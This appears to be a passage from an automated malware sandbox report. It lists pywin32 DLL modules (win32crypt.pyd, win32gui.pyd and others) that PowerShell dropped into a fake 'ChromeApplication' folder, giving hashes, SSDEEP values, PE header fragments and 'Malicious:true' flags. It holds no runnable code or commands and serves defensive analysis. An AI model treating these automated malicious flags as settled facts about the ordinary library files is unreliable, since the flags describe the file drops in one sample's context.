                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30208
                                                                                                                                                                                                  Entropy (8bit):6.12826822648431
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:4t/yZ7KPObCP6EC5ZN4qel/yp2eR1WDk3MuCVK:W6ZGPOc6EmNreBeR1WDk3MuCVK
                                                                                                                                                                                                  MD5:75D072824426AC103DBED6C7F794AC84
                                                                                                                                                                                                  SHA1:1217F4826C2379A6FA25D738AE24087BE94DFD16
                                                                                                                                                                                                  SHA-256:4F25FDD82B2E0631CA08C03911FB07DF35B044BABA38A7A1790B1E9FE0DAC20C
                                                                                                                                                                                                  SHA-512:F9679201390C4B4840BF1268FB39C5723DE15A433CE2267FDC0E0CE40BC4A2114F032B7127C7F272148183A428FE62A4DF609CB3DCD79AF4659DD1299F891A26
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,......................~......~......~......~....H.~.......~.......~...........H.~....H.~....H.~....Rich............PE..L......d...........!.....<...6......E:.......P............................................@.........................ph..T....h..........\.......................(....b..T...........................Hc..@............P...............................text...+:.......<.................. ..`.rdata...$...P...&...@..............@..@.data...`............f..............@....rsrc...\............j..............@..@.reloc..(............n..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32crypt.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):103424
                                                                                                                                                                                                  Entropy (8bit):6.473068406190836
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:1Vr5D5aHAa/RCI1lHC836SPWxeTcSxk83rR4u2fUqsYWsqydaZDOJPeQyWJa68yY:Fa/RCI1lHC834Ihr2JNvEZDcWQyWfY
                                                                                                                                                                                                  MD5:09447DBDABCF0CC1DF2F18BC914C52C6
                                                                                                                                                                                                  SHA1:4016C3C01F11BF7084FF0B9D1F83223CAAE163D0
                                                                                                                                                                                                  SHA-256:DE873B0FB18DC50255295E422F29145343F600FF778DC12B3FCEC7B9B6739CF9
                                                                                                                                                                                                  SHA-512:293150C3D6E3389D03DAAA03DFAB9AC58D458C85005EC561ABFFBE5C0CBB4AD5C26E7105331BA291C4F8D25F74C58615A3D33B6481B50918581E2C7E823279B8
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0C..t"m.t"m.t"m.}Z..p"m.&Wl.v"m.&Wh.d"m.&Wi.~"m.&Wn.u"m..Wl.v"m..Kl.v"m.`Il.s"m.t"l.."m..Wd.}"m..Wm.u"m..Wo.u"m.Richt"m.........PE..L......d...........!................*.....................................................@.........................0>......4Z..........d.......................x..../..T............................/..@...............t............................text............................... ..`.rdata...s.......t..................@..@.data...T............\..............@....rsrc...d............p..............@..@.reloc..x........ ...t..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32event.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22528
                                                                                                                                                                                                  Entropy (8bit):6.028742764868691
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:xQsQ0QgQNYqa0ajYva5dM4ALhDbXAjqcQ/Th/Gddbcg8JFBc5Zp4hp0DQMdCoFzz:x1dRelarca5dMhfbp/Th/Gddbc7jBGpf
                                                                                                                                                                                                  MD5:41EA4E00EC740873C492D3F5EDA05FD3
                                                                                                                                                                                                  SHA1:DB82D7629A720409B02BD342B1087F0C5313F4DF
                                                                                                                                                                                                  SHA-256:A081CB434C393C73A02BE1FC29E35E7C1042EF357CEBD583B506C468BA700C85
                                                                                                                                                                                                  SHA-512:D55FC13C52F8C69CAC5A266B84D792D8E74B612E1929A6322D2498FB366BFD35331F5B06F4F55204545283698D59883249BED45BF12C208511B9549FEA185B55
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........P..d...d...d.......d..e...d..a...d..`...d..g...d.X.e...d.>.e...d...e...d...e...d.X.m...d.X.d...d.X.f...d.Rich..d.................PE..L......d...........!.....0...$...............@............................................@..........................L..T....L.......p..d............................G..T...........................@H..@............@..t............................text............0.................. ..`.rdata.......@.......4..............@..@.data...X....`.......L..............@....rsrc...d....p.......N..............@..@.reloc...............R..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32evtlog.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61440
                                                                                                                                                                                                  Entropy (8bit):6.298600675362136
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:gf3V2Mt08eYYFqq/CPld8KvtT6fJhOnYa8tWM7NAwaKrAJTgd2f/Yj1zVzWYDrb5:gvV2Mtuwq/CPld8KvtT6fJhOnYa8tWMj
                                                                                                                                                                                                  MD5:E3D847208F18FDE613362CBF174A8E4E
                                                                                                                                                                                                  SHA1:F568090C3B20C58A0172BBD32423F1C3B803C379
                                                                                                                                                                                                  SHA-256:C68E7AEB7FAAA2EFA0A9137EF7A5DDE0EABE8F5157EBCCAA008BEEA9E5696B71
                                                                                                                                                                                                  SHA-512:4556E2D4A253E9031B4FA4CBA3E557D83F1DCFFA750C19D9DDAE74EE1CE63D0846455FABB425E860D879B9D5198CDFF2770B67BC5ABFCB609587DD26996C5EBD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t..}0...0...0...9.J.4...b../2...b../:...b../1....../2....../2...b../$...$../5...0........../1....../1.....&.1....../1...Rich0...........PE..L......d...........!.........h......z{.......................................0............@.............................X...h........... .......................T... ...T...............................@...................L...@....................text...{........................... ..`.rdata..0C.......D..................@..@.data...............................@....rsrc... ...........................@..@.reloc..T...........................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32file.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):115200
                                                                                                                                                                                                  Entropy (8bit):6.504266748723327
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:jNtP2R0ZEzCMiRaDuhSwELL3My7N+AeoIC/CBW0fvH+TvMP+EGYKSZOTUWMTID:RbZqz1uhSwELL3My7N+AeoIC/CBW0fv6
                                                                                                                                                                                                  MD5:3AB191022B6F79FF75402FA139B060EA
                                                                                                                                                                                                  SHA1:F929DCEC2B4B70512944F812F5A581424104DC10
                                                                                                                                                                                                  SHA-256:8B10DE64114ABAC0427670FD3B969215FC02C7CF44D57FD8C3E120D8FB0147E1
                                                                                                                                                                                                  SHA-512:8F86CC20D3E5AE7FB097458D2A529B1982A1AD79A6447B6842F85C93835910C42159D1C1C2F0762377A1B48FBCADF15421371944DA9E15A442E815722390318F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w>...P...P...P..n....P.cQ...P.cU...P.cT...P.cS...P..cQ...P.t.Q...P..}Q...P...Q...P..cY...P..cP...P..cR...P.Rich..P.........................PE..L......d...........!.........................0............................................@..........................{..T...D|..........\........................"...q..T...........................@r..@............0..l............................text............................... ..`.rdata..Hk...0...l..................@..@.data...T...........................@....rsrc...\...........................@..@.reloc...".......$..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32gui.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):162304
                                                                                                                                                                                                  Entropy (8bit):6.458373474998665
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:1fAYVvPfG0yzM4pU6zeXuWp8fNGOKl/kL9WGoyEyEhjvlNjGjYAz2ZNDEYn5:1xG00ML6zeXuWpYKl/kL9Wpv/IYASZ
                                                                                                                                                                                                  MD5:8F2FB6983057C97104E84052B6AB60E1
                                                                                                                                                                                                  SHA1:B83E73DE8FE4DCD53F2FF39B08138CEC62874412
                                                                                                                                                                                                  SHA-256:62064C7DF26B8F4A849FAEDFC5A3C28B5A72F0CA9F433673C848C733DF9337DA
                                                                                                                                                                                                  SHA-512:F21D14776F3B45E66A3B0704FA6C7D0B3EA56E1FC90F387108353DD00DD233FF1D6ABCC1D686C616E1F318D071E341DFC175AF496505A2C2A2450F489A0632DB
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................d.................................!.......G...................*...!.......!.......!.......Rich....................PE..L......d...........!......................................................................@.............................h...X........p..\........................3......T...........................p...@...............P............................text...!........................... ..`.rdata..z...........................@..@.data...t ...@.......$..............@....rsrc...\....p.......B..............@..@.reloc...3.......4...F..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32help.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):45568
                                                                                                                                                                                                  Entropy (8bit):6.193604641887921
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:NRoU2g50UjZAiEmWcQav591f+EYAaw2ts+yfzi59Z5WGF:ToUFPjZAiECr59gifzi59Z5WM
                                                                                                                                                                                                  MD5:FDC575B4463A607E8CE9EC7309C26F5C
                                                                                                                                                                                                  SHA1:13380E4882BC9AEC4E36BD9A482AEF1DC680678C
                                                                                                                                                                                                  SHA-256:5688E115DFB0F60A4D9709F5D5131AD5F9B3EE743A7E6ADC9B580441ECA27300
                                                                                                                                                                                                  SHA-512:20566E5817920B9FE7CCDBC1725E54426E984872440E1641E436D805B58467F5285335B6A40429522742BDB3CCE9392F533B726B015FB761C9DAD1E0CEFE1254
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T..\.c...c...c.......c..B....c..B....c..B....c..B....c.......c.......c.......c...c..Ic.......c.......c.......c.......c..Rich.c..........PE..L...J..d...........!.....d...J......>^....................................................@............................T...4...........\..............................T...........................@...@............................................text...4b.......d.................. ..`.rdata..f/.......0...h..............@..@.data...D...........................@....rsrc...\...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32inet.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):43520
                                                                                                                                                                                                  Entropy (8bit):6.246977819975624
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:el4n4Y2+gREyfmUeGapWLsKZN/KqxQppMBxCq6oeHjxOPaD/Uh0hGJ:e+2bRHeU2JKN/V6v+x1Yx8aD/Uhmi
                                                                                                                                                                                                  MD5:F8EEC4EBE58AAD9746B57F3EE2A977DC
                                                                                                                                                                                                  SHA1:D6F04AA7C2F8FE95DCE52175A3FC5D3AC0BBA632
                                                                                                                                                                                                  SHA-256:3915E25246577A1F9D1F9E8975E347DA0752326F7EFE1D4DB8170008E2276114
                                                                                                                                                                                                  SHA-512:FF9F9750170E4B8C9BBC779C14407702CEBCE5B5D5696D0A7DF9C83ABFF6FB214FC1B469AFB7226C0DB1999F1FE2099B47E091FDDCA013AF9C641DD9DD975E1B
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8...k...k...k..Vk...k..j...k..j...k..j...k..j...kM..j...k+..j...k...j...k...k...kM..j...kM..j...kM..j...kRich...k........................PE..L......d...........!.....b...D.......]....................................................@.............................T...4...........\.......................|.......T...........................`...@...............@............................text...!a.......b.................. ..`.rdata...+.......,...f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32job.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22528
                                                                                                                                                                                                  Entropy (8bit):6.082037823664698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5gSx7zLzCuezPb0HePA6SS4R/0xe4SCLvYWyi+sjxXTuXnEOZKbEqA1ny74XKYx6:rvabo4gxivjuXnEOZKbEqA1ny74XKYxT
                                                                                                                                                                                                  MD5:723AE5B4CEBB12963C6BF5927D6DA0FC
                                                                                                                                                                                                  SHA1:92321A873ECD985A54CDD680F0524F978C4BF52F
                                                                                                                                                                                                  SHA-256:CDB779BD8F29280C0F2172FAA3EA4E2A9F0E8442271073FE46B9EB91D4DA97CB
                                                                                                                                                                                                  SHA-512:8416E1B99084CB97ED6ABDA53BAFF96E09CD3C8C689C2E783650253484CCE73C289897F6572788698762354E7827479626C973EBAD49ADD392AACD705B629A52
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T[.d.[.d.[.d.R..._.d...e.Y.d...a.P.d...`.Q.d...g.Z.d...e.Y.d...e.Y.d.O.e.^.d.[.e...d...m.Z.d...d.Z.d...f.Z.d.Rich[.d.................PE..L......d...........!.....(...,.......'.......@............................................@..........................T..P....T.......p..\.......................P....O..T...........................(P..@............@..D............................text...['.......(.................. ..`.rdata.......@... ...,..............@..@.data........`.......L..............@....rsrc...\....p.......N..............@..@.reloc..P............R..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32lz.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13824
                                                                                                                                                                                                  Entropy (8bit):5.71529554163592
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OLHlMdotuTqQ1heKiLjpl9o/SdCDBFEB4:MHlMdgQ1hEv9o/DDTE
                                                                                                                                                                                                  MD5:31F78D63F93FE278190E52CD69A7F267
                                                                                                                                                                                                  SHA1:F54192A9337BF7D17430ED574B2EEB581C89E8C5
                                                                                                                                                                                                  SHA-256:43FC45CAD4C32A59350D774190BC27FD7985EFED1F1CB8BE6ABE225B2965A2B8
                                                                                                                                                                                                  SHA-512:B1AC077A9C59620D720B6A186516D955DE044F2707B9F4CCC37027694383B9DFA52EF6B617E22B217B60CC537464BF42A6A2DAF16E4D0CD07CF69C59B9FBFDB4
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{..N{..N{..6...N{..;z..N{..;~..N{..;...N{..;x..N{.0;z..N{.V'z..N{..%z..N{..Nz..N{.0;r..N{.0;{..N{.0;y..N{.Rich.N{.................PE..L......d...........!................/........0...............................p............@..........................8..P....8.......P..T....................`.......3..T...........................@4..@............0...............................text............................... ..`.rdata.."....0......................@..@.data...,....@.......,..............@....rsrc...T....P......................@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32net.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):67584
                                                                                                                                                                                                  Entropy (8bit):5.958181418956461
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:sxW0POaJy1CO9HVtlIW4OLv4nA4Td6dOaYfJb0C:0HEC0l4OLv8A4By1YfJb0C
                                                                                                                                                                                                  MD5:543D488FF52C88CDD82B5D244CCE250D
                                                                                                                                                                                                  SHA1:E858F2A5EB89CCBB0949E5A6E4E9792A4281A8F7
                                                                                                                                                                                                  SHA-256:B7472CEDADEC654A4C446751693A176BBB08D2346F5E5D90DFFD64A400D3E1DD
                                                                                                                                                                                                  SHA-512:4EA139223CF4968FA63D8140CDFA9BE13EF1B64D85AEB76D550401B0A8E4AF6B2B23EDAA34A31945B3BFAE4063757E821439DF6773D99BFC9710B1F4D39E1898
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2......2...3...2...7...2...6..2...1..2.!.3...2.G.3...2...3..2..3.O.2.!.;..2.!.2..2.!.0..2.Rich.2.................PE..L......d...........!.........................................................@............@.........................0...P...............\.................... ..........T...........................@...@............................................text.............................. ..`.rdata..p?.......@..................@..@.data...x).......&..................@....rsrc...\...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32pdh.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29696
                                                                                                                                                                                                  Entropy (8bit):6.018884072447907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Vlu/UA+pWHC1yUpzw2qYXmyQ4HSn4TR94X6YgaOD:VluseiNpTXDSWRmX6YgaOD
                                                                                                                                                                                                  MD5:229D5D494A5447733F2C4A7AAD19CFB5
                                                                                                                                                                                                  SHA1:5281422C66AF3F8B54FA23BFEE54D286C82E9E3E
                                                                                                                                                                                                  SHA-256:D37491BB2704F0F9BB3222C16623B4F34E4BD47655B92C349163A5C7B49B2A88
                                                                                                                                                                                                  SHA-512:7D5C8392E2FBF7F47769A2991B0D4770D8CB7B98BB20DE3E38B067CF04885D3C077783E87063F3600F9F4D3E8AA659D430D864AFE7B7C000E19DD5D9D770A07F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a..2..2..2...2..2..3..2...3..2..3..2..3..2..3..2T..3..22..3..2..2..2T..3..2T..3..2T..3..2Rich..2................PE..L......d...........!.....>...2.......;.......P............................................@..........................e..P....e..........\...........................x]..T............................]..@............P..p............................text...*<.......>.................. ..`.rdata... ...P..."...B..............@..@.data................d..............@....rsrc...\............f..............@..@.reloc...............j..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32pipe.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22528
                                                                                                                                                                                                  Entropy (8bit):6.022043122265829
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4TAw3DUBG5B55IDoScy3JmYid4ZbesjZjMDcCVBodOcFTazCmM/l:IN473w+Zb1CVedZT+i
                                                                                                                                                                                                  MD5:CEE60EA427E79CC50BB1222C0002F005
                                                                                                                                                                                                  SHA1:61817D367F96E6A5158CCEAD92AEFE1BC3D1120C
                                                                                                                                                                                                  SHA-256:BA3F9F85CD1CAF5FEDB20117BDE3C80DDEAAD4D884B9D0974827FE676B2B9418
                                                                                                                                                                                                  SHA-512:A393D9649EE101326D4D1866218C6B4884D5D479EF3B36D7F40025B3917472B2D6265855D1A5F1EF577DF599B8A329D51104A85A4633574FA27F393DCD9A6913
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+..Uo...o...o...f.z.i...=...m...{...m...=...d...=...e...=...n.......m.......l...o...2.......n.......n.......n...Richo...................PE..L......d...........!.........&.......+.......@............................................@......................... M..T...tM.......p..\............................G..T............................H..@............@...............................text....,.......................... ..`.rdata..`....@.......2..............@..@.data...8....`.......L..............@....rsrc...\....p.......N..............@..@.reloc...............R..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32print.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):59392
                                                                                                                                                                                                  Entropy (8bit):6.380600578528712
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:qTFFfWM8fNR2VILhed+wQufIttTDCpvta:uFFf18fNgRQJttTDCp8
                                                                                                                                                                                                  MD5:ED5A5AEC5479981E90A204CF377B6E5C
                                                                                                                                                                                                  SHA1:BFDD8E44AC33A9877135FA87C795C7C068285500
                                                                                                                                                                                                  SHA-256:0AA27A69EC8259628D6C7AA4003D8D452D1E92B2830E50F7B25D25161DF7C51C
                                                                                                                                                                                                  SHA-512:DBD58388B9598F93FFD899156572A55761C2CCE343C6F832195FAE7489559541530C27B23F2A2DB4AE225C037A7AFE0D29026681E77A73B85FF9DCC9E2291DB1
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(...P<..(...]...(...]...(...]...(...]...(..)]...(..OA...(...C...(...(..h(..)]...(..)]...(..)]...(..Rich.(..........PE..L......d...........!.........\............................................... ............@.............................T...............d...........................X...T...............................@...............,............................text.............................. ..`.rdata...@.......@..................@..@.data...d...........................@....rsrc...d...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32process.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42496
                                                                                                                                                                                                  Entropy (8bit):6.281279371665695
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:76eWxniB/Fh3SiYX4+TLeFuIturwsyrZ1mPQHn+fECI0EDjFkyaZ7roylY1:76eWFiN2iYX4/FHuxyrZIP9hI0E3Fkyf
                                                                                                                                                                                                  MD5:A887CC450D2FA4AEF90CAB67A5305E57
                                                                                                                                                                                                  SHA1:39260F2AFAA360EACA5F50765295DE6D0F9BFF4D
                                                                                                                                                                                                  SHA-256:816F67F4073AB1A8829891D67A09D47ADF54B4D07446FA6865F6B6BDF3BFF7DB
                                                                                                                                                                                                  SHA-512:29994719ED5B5F2A7FFF3E04D08AC2478E4CFBA8FBDDE238B664BF8B9C9B9415B1AC54BB9E029F434DE4A35528E68D1915D1F5C48EB63B76CE2CDCFC35BD63B2
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h-...C..C..C.q...C..|B..C..|F..C..|G..C..|@..C.K|B..C.-`B..C.bB..C..B...C.K|J..C.K|C..C.K|A..C.Rich..C.........PE..L......d...........!.....^...D.......Y.......p............................................@.............................X..............l...............................T...............................@............p..0............................text....\.......^.................. ..`.rdata...-...p.......b..............@..@.data...l...........................@....rsrc...l...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32profile.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21504
                                                                                                                                                                                                  Entropy (8bit):5.872875155664248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:tULDzcFHflA6m4YKG3fwx7IPTWyIjOdh/gWIjNv54ngy+idwmJuspNxsthorVpz5:tonc5lA6m4YKGPwx7IPmoh/gRWFRJ1NX
                                                                                                                                                                                                  MD5:5FD3EDCA8208822C4688FEE695EF8F73
                                                                                                                                                                                                  SHA1:660B6DDE1A2695E7759FC525828F86D6EACABD41
                                                                                                                                                                                                  SHA-256:E64DBA9F2C4800BFB4F345EC0996543740D9B8B7598702317A9C041D238FA8F7
                                                                                                                                                                                                  SHA-512:E45164F502E52B229C671E57865C5C726C4A4F16B86C6C019B8A3223C62026DA65039A4FF2DCA7269DC209F2AA9B4AEFB9424BB5B0B650E504F004E9EC703842
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b.X`.OX`.OX`.OQ..O\`.O...NZ`.O...NH`.O...NR`.O...NY`.O...NZ`.O...NZ`.OL..N]`.OX`.O.`.O...NY`.O...NY`.O...NY`.ORichX`.O................PE..L......d...........!.....&...*.......#.......@............................................@..........................P..X....Q.......p..l............................H..T............................I..@............@..@............................text....%.......&.................. ..`.rdata.......@.......*..............@..@.data........`.......F..............@....rsrc...l....p.......J..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32ras.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27648
                                                                                                                                                                                                  Entropy (8bit):6.014332921575553
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ezGuoLEiU/JSmoUlEp+7ExB8Nh4QmUNs+8:EGuCpU/J5lOuaUh4QmUNs+
                                                                                                                                                                                                  MD5:4351B2869692F0D5A16EF76EECAD350D
                                                                                                                                                                                                  SHA1:BF22DB4FA2296702522CDC627A27DBF76BD7404F
                                                                                                                                                                                                  SHA-256:97A2513C398EB384162DA55FCE6295B5FFB412E1E97ABD8020A31DA18FB1FB7B
                                                                                                                                                                                                  SHA-512:A6B3303571CF6326A09628AFCBB87C7243C25422967B7EEE24091C4AEF66D9347AB1B069C5A9A675E5C1FB8BA60D6A8964F81E2AC1FEB4812E1B55A8BBB0EE14
                                                                                                                                                                                                  Malicious:true
